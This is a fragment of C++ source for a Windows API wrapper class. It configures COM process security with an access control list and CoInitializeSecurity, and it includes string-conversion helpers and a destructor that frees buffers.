			ea[0].grfAccessMode = SET_ACCESS;
			ea[0].grfInheritance = NO_INHERITANCE;
			ea[0].Trustee.pMultipleTrustee = NULL;
			ea[0].Trustee.MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
			ea[0].Trustee.TrusteeForm = TRUSTEE_IS_SID;
			ea[0].Trustee.TrusteeType = TRUSTEE_IS_GROUP;
			ea[0].Trustee.ptstrName = (LPTSTR)rgSidBA;

			ea[1].grfAccessPermissions = COM_RIGHTS_EXECUTE | COM_RIGHTS_EXECUTE_LOCAL;
			ea[1].grfAccessMode = SET_ACCESS;
			ea[1].grfInheritance = NO_INHERITANCE;
			ea[1].Trustee.pMultipleTrustee = NULL;
			ea[1].Trustee.MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
			ea[1].Trustee.TrusteeForm = TRUSTEE_IS_SID;
			ea[1].Trustee.TrusteeType = TRUSTEE_IS_GROUP;
			ea[1].Trustee.ptstrName = (LPTSTR)rgSidLS;

			ea[2].grfAccessPermissions = COM_RIGHTS_EXECUTE | COM_RIGHTS_EXECUTE_LOCAL;
			ea[2].grfAccessMode = SET_ACCESS;
			ea[2].grfInheritance = NO_INHERITANCE;
			ea[2].Trustee.pMultipleTrustee = NULL;
			ea[2].Trustee.MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
			ea[2].Trustee.TrusteeForm = TRUSTEE_IS_SID;
			ea[2].Trustee.TrusteeType = TRUSTEE_IS_GROUP;
			ea[2].Trustee.ptstrName = (LPTSTR)rgSidNS;

			ea[3].grfAccessPermissions = COM_RIGHTS_EXECUTE | COM_RIGHTS_EXECUTE_LOCAL;
			ea[3].grfAccessMode = SET_ACCESS;
			ea[3].grfInheritance = NO_INHERITANCE;
			ea[3].Trustee.pMultipleTrustee = NULL;
			ea[3].Trustee.MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
			ea[3].Trustee.TrusteeForm = TRUSTEE_IS_SID;
			ea[3].Trustee.TrusteeType = TRUSTEE_IS_GROUP;
			ea[3].Trustee.ptstrName = (LPTSTR)rgSidPS;

			ea[4].grfAccessPermissions = COM_RIGHTS_EXECUTE | COM_RIGHTS_EXECUTE_LOCAL;
			ea[4].grfAccessMode = SET_ACCESS;
			ea[4].grfInheritance = NO_INHERITANCE;
			ea[4].Trustee.pMultipleTrustee = NULL;
			ea[4].Trustee.MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
			ea[4].Trustee.TrusteeForm = TRUSTEE_IS_SID;
			ea[4].Trustee.TrusteeType = TRUSTEE_IS_GROUP;
			ea[4].Trustee.ptstrName = (LPTSTR)rgSidSY;

			dwRet = ::SetEntriesInAcl( ARRAYSIZE( ea ), ea, NULL, &pAcl );
			if( dwRet != ERROR_SUCCESS || pAcl == NULL )
			{
				status = " Error Set SetEntriesInAcl  ";
				fRet = FALSE;
				goto exit;
			}

			fRet = ::SetSecurityDescriptorOwner( &securityDesc, rgSidBA, FALSE );
			if( !fRet )
			{
				status = " Error Set SetSecurityDescriptorOwner  ";
				goto exit;
			}

			fRet = ::SetSecurityDescriptorGroup( &securityDesc, rgSidBA, FALSE );
			if( !fRet )
			{
				status = " Error Set SetSecurityDescriptorGroup  ";
				goto exit;
			}

			fRet = ::SetSecurityDescriptorDacl( &securityDesc, TRUE, pAcl, FALSE );
			if( !fRet )
			{
				status = " Error Set SetSecurityDescriptorDacl  ";
				goto exit;
			}
 
			hrRet = ::CoInitializeSecurity( &securityDesc,-1,NULL,NULL,RPC_C_AUTHN_LEVEL_PKT_PRIVACY,RPC_C_IMP_LEVEL_IDENTIFY,NULL,EOAC_DISABLE_AAA | EOAC_NO_CUSTOM_MARSHAL,NULL );
			if( FAILED( hrRet ) )
			{
				status = " Error Set CoInitializeSecurity  ";
				fRet = FALSE;
				goto exit;
			}

			fRet = TRUE;
            this->debug_error = "Successful";

		exit:

			this->debug_error = status;
			::LocalFree( pAcl );

			return fRet;
		}

		::LPCWSTR String_To_LPCWSTR(::std::string convert_string) 
		{
			const char *x_string = convert_string.c_str();
			this->convertstring = new wchar_t[__us_size__];
			::mbstowcs(this->convertstring, x_string, __us_size__);
			return this->convertstring;
		};
		
		::LPWSTR CHAR_To_LPWSTR(char * input)
		{
			int nSize1 = ::MultiByteToWideChar(CP_ACP, 0, input, -1, NULL, 0);
			this->wUserName = new WCHAR[nSize1];
			::MultiByteToWideChar(CP_ACP, 0, input, -1, this->wUserName, nSize1);
			return wUserName;
		}

	public:
		void String_To_LPCWSTR_DELETE(void)
		{
			delete [] this->convertstring;
		}

		void CHAR_To_LPWSTR_DELETE(void)
		{
			delete [] this->wUserName;
		}

		~WinApi(void)
		{
			delete [] this->wUserName;
			delete [] this->convertstring;
			delete [] this->MBR_CONTENT;
		}
	};

//! Nastavenie nulovej inštancie pre prístup Singletonu//
	WinApi * WinApi::instance = nulladdress;

}